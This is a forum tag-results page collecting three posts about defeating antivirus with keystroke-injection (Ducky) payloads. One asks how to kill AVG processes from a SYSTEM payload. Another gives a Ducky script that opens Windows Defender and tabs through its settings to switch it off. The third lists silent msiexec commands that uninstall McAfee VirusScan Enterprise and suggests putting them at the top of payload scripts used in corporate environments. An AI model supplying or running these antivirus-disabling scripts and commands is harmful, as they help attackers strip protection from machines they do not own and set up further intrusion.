Showing results for tags 'AV'.

Found 3 results

  1. Hey, I recently tried to kill the AV processes of, for example, AVG. My payload had SYSTEM privileges but I couldn't kill the AV processes, which also run under the SYSTEM user. I noticed a process which ran higher than SYSTEM which belonged to AVG. Is it common that an AV has some sort of process which runs in kernel mode or something which protects the other processes? Is there even a way to kill the AV as a SYSTEM user?
  2. Hello all, I've put together a simple script that attempts to disable Windows Defender on Windows 8.1 (will update to 7 later). My only problem is that I have an issue where there is a check box titled "turn on this app" and when I tab over to it, there is no way for me to uncheck that selection. I hope that someone might either find a workaround to my method or find a way to make it work. Thank you.

     Disable Windows Defender:

         REM Author : Hobbes
         REM Description : Attempts to disable Windows Defender anti-virus.
         REM Note : Only tested on Windows 8.1 - Windows 7 compatibility unknown.
         REM ***[Initial Delay]***
         DELAY 3000
         REM ***[Navigate to Windows Defender]***
         GUI r
         DELAY 250
         STRING cmd
         ENTER
         DELAY 800
         STRING start "" "C:\Program Files\Windows Defender\MSASCui.exe"
         ENTER
         DELAY 400
         REM **[Disables Defender]***
         TAB
         DELAY 80
         TAB
         DELAY 80
         RIGHTARROW
         DELAY 80
         RIGHTARROW
         DELAY 80
         RIGHTARROW
         DELAY 80
         TAB
         DELAY 80
         DOWNARROW
         DELAY 80
         DOWNARROW
         DELAY 80
         DOWNARROW
         DELAY 80
         DOWNARROW
         DELAY 80
         DOWNARROW
         DELAY 80
         DOWNARROW
         DELAY 80
         TAB
  3. I found the following little tidbit that has been of great use in corporate environments. Simply adding the appropriate line toward the top of your ducky script (or adding them all just in case works too) can significantly decrease AV detection (considering it removes it from the equation!) :D

     VirusScan Enterprise (VSE) command line removal using msiexec.exe:

     Click Start, Run. Type the removal string for your version of VSE, then click OK.

     VirusScan Enterprise 8.8
         msiexec /x {CE15D1B6-19B6-4D4D-8F43-CF5D2C3356FF} REMOVE=ALL REBOOT=R /q

     VirusScan Enterprise 8.7i
         msiexec /x {147BCE03-C0F1-4C9F-8157-6A89B6D2D973} REMOVE=ALL REBOOT=R /q

     VirusScan Enterprise 8.5i
         msiexec.exe /x {35C03C04-3F1F-42C2-A989-A757EE691F65} REMOVE=ALL REBOOT=R /q

     VirusScan Enterprise 8.0i
         msiexec.exe /x {5DF3D1BB-894E-4DCD-8275-159AC9829B43} REMOVE=ALL REBOOT=R /q

     Switches that you can use with msiexec.exe:

     /q  The quiet switch ensures the removal is done silently - nothing is displayed.
     /x  This switch will automatically remove an installation.
     /i  This switch will communicate via the UI (User Interface) and is used to Repair, Remove, or Modify an installation.
     /?  This switch provides additional information on all msiexec.exe command switches.